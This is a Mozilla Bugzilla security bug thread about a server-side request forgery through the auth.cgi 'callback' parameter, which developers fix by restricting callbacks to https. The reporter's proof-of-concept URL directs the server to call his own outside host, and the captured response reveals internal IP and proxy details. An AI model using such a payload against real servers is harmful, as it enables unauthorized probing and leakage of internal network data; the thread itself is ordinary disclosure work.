Closed
Bug 1310747
Opened 8 years ago
Closed 8 years ago
SSRF
Categories
(bugzilla.mozilla.org :: General, defect)
Tracking
()
RESOLVED
FIXED
People
(Reporter: p4r3sh.p4rm4r, Assigned: dylan)
References
()
Details
(Whiteboard: [reporter-external] [web-bounty-form] [verif?])
Attachments
(2 files)
116.06 KB,
image/png
|
Details | |
615 bytes,
patch
|
dkl
:
review+
|
Details | Diff | Splinter Review |
hi, Endpoint: callback= steps 1. go to below url: https://bugzilla.mozilla.org/auth.cgi?callback=http://testss.blinkie.xyz&description=foobar 2. after accepting 'Auth Delegation Request' i am getting response back to my host. response i got: ip: 63.245.214.162 { "host": "testss.blinkie.xyz", "user-agent": "libwww-perl/5.835", "content-length": "104", "content-type": "application/json", "via": "1.1 proxy2.dmz.scl3.mozilla.com (squid/3.1.23)", "x-forwarded-for": "10.22.82.28", "cache-control": "max-age=259200", "connection": "keep-alive", "url": "/" }
Flags: sec-bounty?
Comment 1•8 years ago
|
||
Dylan, I think this is expected behavior, but you take a look at it please? Thanks!
Group: websites-security → bugzilla-security
Component: Other → General
Flags: needinfo?(dylan)
Product: Websites → bugzilla.mozilla.org
Version: unspecified → Production
even i thought that, but Rather than proxying requests on behalf of users, application should have user’s browser retrieve the desired information. If it is necessary to proxy the request, a whitelist should be used on the server side and the User-Agent information should be stripped or modified.
Comment 3•8 years ago
|
||
Wow. If this is intended behavior we need to put /some/ rules into which sites we allow. At the very least we shouldn't be allowing insecure http: links.
Assignee | ||
Comment 4•8 years ago
|
||
(In reply to Paresh from comment #2) > even i thought that, but Rather than proxying requests on behalf of users, > application should have user’s browser retrieve the desired information. If > it is necessary to proxy the request, a whitelist should be used on the > server side and the User-Agent information should be stripped or modified. Using the browser is absolutely out due the obvious ways of gaming that system. (In reply to Daniel Veditz [:dveditz] from comment #3) > Wow. If this is intended behavior we need to put /some/ rules into which > sites we allow. At the very least we shouldn't be allowing insecure http: > links. The user does have to confirm via "Auth Delegation Request". I note this feature and its current design were both subject to an RRA. I agree that we should limit it to to https only.
Flags: needinfo?(dylan)
Assignee | ||
Comment 5•8 years ago
|
||
This is the message you have to click through, which is pretty indicative of the action that will be performed.
Assignee: nobody → dylan
Assignee | ||
Comment 6•8 years ago
|
||
Attachment #8801830 -
Flags: review?(dkl)
Comment 7•8 years ago
|
||
Marking this as sec-bounty-, as this is working as intended. Nice job on the patch as always, dylan. :)
Group: bugzilla-security
Flags: sec-bounty? → sec-bounty-
Comment 8•8 years ago
|
||
Comment on attachment 8801830 [details] [diff] [review] 1310747_1.patch Review of attachment 8801830 [details] [diff] [review]: ----------------------------------------------------------------- r=dkl
Attachment #8801830 -
Flags: review?(dkl) → review+
as you notice in response, you are using squid/3.1.23, which is older version of squid proxy. Advisory of 3.1.23 http://www.squid-cache.org/Advisories/SQUID-2012_1.txt (DoS in cachemgr.cgi ) why don't you update it to latest version http://www.squid-cache.org/Versions/ ?
Comment 10•8 years ago
|
||
Version numbers are notoriously unreliable, as vendors such as Redhat and Canonical backport security patches to older versions.
Assignee | ||
Updated•8 years ago
|
Status: UNCONFIRMED → NEW
Ever confirmed: true
Assignee | ||
Comment 11•8 years ago
|
||
To git@github.com:mozilla-bteam/bmo.git 2f310fb..3e67364 master -> master
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Reporter | ||
Comment 12•8 years ago
|
||
fix is live or not ?
Assignee | ||
Comment 13•8 years ago
|
||
it'll get pushed out next week.
Reporter | ||
Comment 14•8 years ago
|
||
in meantime can i go further into that endpoint for testing ?
Assignee | ||
Comment 15•8 years ago
|
||
it would be better to test bugzilla-dev.allizom.org.
Assignee | ||
Comment 16•8 years ago
|
||
The documentation is here: http://bmo.readthedocs.io/en/latest/integrating/auth-delegation.html
You need to log in
before you can comment on or make changes to this bug.
Description
•